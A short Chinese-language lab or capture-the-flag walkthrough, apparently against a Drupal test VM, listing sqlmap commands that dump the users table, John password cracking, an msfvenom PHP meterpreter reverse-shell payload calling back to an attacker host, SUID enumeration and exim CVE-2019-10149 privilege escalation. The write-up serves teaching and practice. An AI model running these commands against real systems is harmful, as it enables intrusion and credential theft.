扫描下。
发现开了SSH。
访问网站,还是Drupal,Dirsearch扫描一波。
都看看,有什么信息。
看到个创建数据库的txt文件。
也没什么用处,还是在网站上转转吧。
看到这个参数很可疑啊,单引号看看。
报错了,直接SQLMap跑。
sqlmap -u http://192.168.70.164/?nid=1 --dbs
sqlmap -u http://192.168.70.164/?nid=1 -D d7db --tables
sqlmap -u http://192.168.70.164/?nid=1 -D d7db -T users --columns
sqlmap -u http://192.168.70.164/?nid=1 -D d7db -T users -C name,pass --dump
john爆破。
爆到了john账户的密码。
登陆。
在这里找到了可以使用PHP代码的地方。
msf反弹Sehll
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.70.154 LPORT=3333 -f raw
选择PHP之后,回到view界面填入刚才的Shell代码,提交。
成功连接。
python -c "import pty;pty.spawn('/bin/bash')"//获得交互式Shell
find / -perm -4000 2>/dev/null//查找具有SUID权限的文件
exim --version //查看exim信息
看一下有写入权限的目录。
用到的是CVE-2019-10149
用的时候出现一直失败,重新Shell一下还是不行,后来上网查是直接用netcat方式。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。